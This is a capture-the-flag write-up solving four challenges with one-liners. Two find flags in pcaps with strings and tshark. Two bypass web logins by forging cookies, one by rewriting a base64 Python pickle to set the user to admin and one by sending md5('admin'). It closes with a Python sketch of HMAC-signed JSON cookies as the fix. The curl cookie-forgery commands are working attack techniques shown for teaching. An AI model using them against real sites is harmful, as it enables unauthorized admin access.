So I grouped these all together for two main reasons:
- I was inspired seeing this short writeup for GeoKitties - https://twitter.com/k_firsov/status/726841516174508033
- Write-ups can take some time, so this is a good way of shortening a few challenges into one post.
Quick note about the writeups below:
- Each of the examples below is a one-liner solution (they may not be the best one-liners because they can be longcat-long, but they were fun to make)
- Each example below has a one-line output including the CTF{...} flag
No Big Deal Pt. 1 (50):
This one was probably one of the easiest challenges I came across (even easier than the 5pt recon). strings'ing the pcap gave an obvious base64-encoded value at the end of the dump, which turned into the flag. Here's the one-liner:
strings -n 9 no-big-deal.pcap | tail -n 1 | base64 -D
Result:
CTF{betterfs.than.yours}
In Recorded Conversation (25):
The name of this challenge evoked the idea that there was going to be a hidden conversation to find a flag in. That was exactly it, in a pcap! For this one I didn't open Wireshark and decided to jump into more tshark. This is not my actual solution for the challenge when I was playing (it was a lot more manual), but the same thing would've worked... Usually there's no time to do silly things like tr, sed & multi-massaged-list-comprehensions to get an answer when you're on the CTF clock.
tshark -r irc.pcap -T fields -e data 2>/dev/null | python -c "import sys; a=sys.stdin.read().split('\n'); a=[x.decode('hex') for x in a]; a=[x for x in a if 'PRIVMSG' in x and '~' not in x]; print a" | tr ',' '\n' | grep '#ctf' | tail -n 8 | head -n 7 | sed 's/.*://g;s/\\.*//g' | tr '\n' ' ' | sed 's/ //g'
Result:
CTF{some_leaks_are_good_leaks_}
Spotted Quoll (50):
This challenge was mainly solved by a team-mate (Unixist), but I helped out a bit with some minor details. Also formed it into this massive one-liner:
curl -L https://spotted-quoll.ctfcompetition.com/admin --cookie obsoletePickle=$(python -c 'import pickle; x = pickle.loads("KGRwMQpTJ3B5dGhvbicKcDIKUydwaWNrbGVzJwpwMwpzUydzdWJ0bGUnCnA0ClMnaGludCcKcDUKc1MndXNlcicKcDYKTnMu".decode("base64")); x["user"] = "admin"; print pickle.dumps(x).encode("base64").replace("\n", "")') 2>/dev/null | grep -i ctf
The challenge consisted of identifying that the cookie was in Python pickle format, dumping the current cookie (base64 encoded), noticing that the user was set to None, changing it to admin, then re-encoding it and sending it off.
Result:
Your flag is CTF{but_wait,theres_more.if_you_call} ... but is there more(1)? or less(1)?
Ernst Echidna (50):
This challenge was also a very simple web challenge, consisting of a cookie that was set to the md5 value of your username. The goal was to view the admin section, so a little echo -n admin | md5sum, and we've got our cookie.
curl https://ernst-echidna.ctfcompetition.com/admin --cookie md5-hash=$(echo -n admin | md5) 2>/dev/null | grep -i ctf
Result:
Congratulations, your token is 'CTF{renaming-a-bunch-of-levels-sure-is-annoying}
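Both web challenges (Spotted Quoll and Ernst Echidna) work because the server trusts a cookie value the client can compute or rewrite on its own. As an added example (not code from either challenge), here is a sketch of the server-side fix in Python 3: state serialized as JSON and authenticated with an HMAC, next to the md5(username) check for contrast. SECRET, the function names and the sample state are assumptions made up for the illustration.

```python
import base64
import hashlib
import hmac
import json

SECRET = b"constructed-demo-key"  # assumption: random key kept only on the server

def weak_md5_check(cookie, username):
    # Ernst Echidna pattern: the "token" is md5(username), which needs no secret,
    # so any client can compute the value for any username.
    return cookie == hashlib.md5(username.encode()).hexdigest()

def issue_cookie(state):
    # JSON instead of pickle: parsing it cannot instantiate arbitrary objects.
    body = base64.urlsafe_b64encode(json.dumps(state, sort_keys=True).encode()).decode()
    tag = hmac.new(SECRET, body.encode(), hashlib.sha256).hexdigest()
    return body + "." + tag

def verify_cookie(cookie):
    # Returns the state dict, or None if the cookie was not issued by this server.
    body, sep, tag = cookie.rpartition(".")
    expected = hmac.new(SECRET, body.encode(), hashlib.sha256).hexdigest()
    if not sep or not hmac.compare_digest(tag.encode(), expected.encode()):
        return None
    return json.loads(base64.urlsafe_b64decode(body))

def client_edit(cookie, **changes):
    # What a client without SECRET can do: rewrite the body, reuse the old tag.
    body, _, tag = cookie.rpartition(".")
    state = json.loads(base64.urlsafe_b64decode(body))
    state.update(changes)
    new_body = base64.urlsafe_b64encode(json.dumps(state, sort_keys=True).encode()).decode()
    return new_body + "." + tag

if __name__ == "__main__":
    # Constructed state, using the "user" field the write-up found set to None.
    issued = issue_cookie({"user": None})
    print(verify_cookie(issued))                             # state round-trips
    print(verify_cookie(client_edit(issued, user="admin")))  # edited body is rejected
    print(weak_md5_check(hashlib.md5(b"admin").hexdigest(), "admin"))
```

The tag covers the exact bytes of the body, so any edit to the "user" field invalidates it unless the editor also holds SECRET.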
These were all simple, but very fun! Had a good time forming the (mostly) one-liners above today. Let me know if you have any more efficient examples of these in the comments!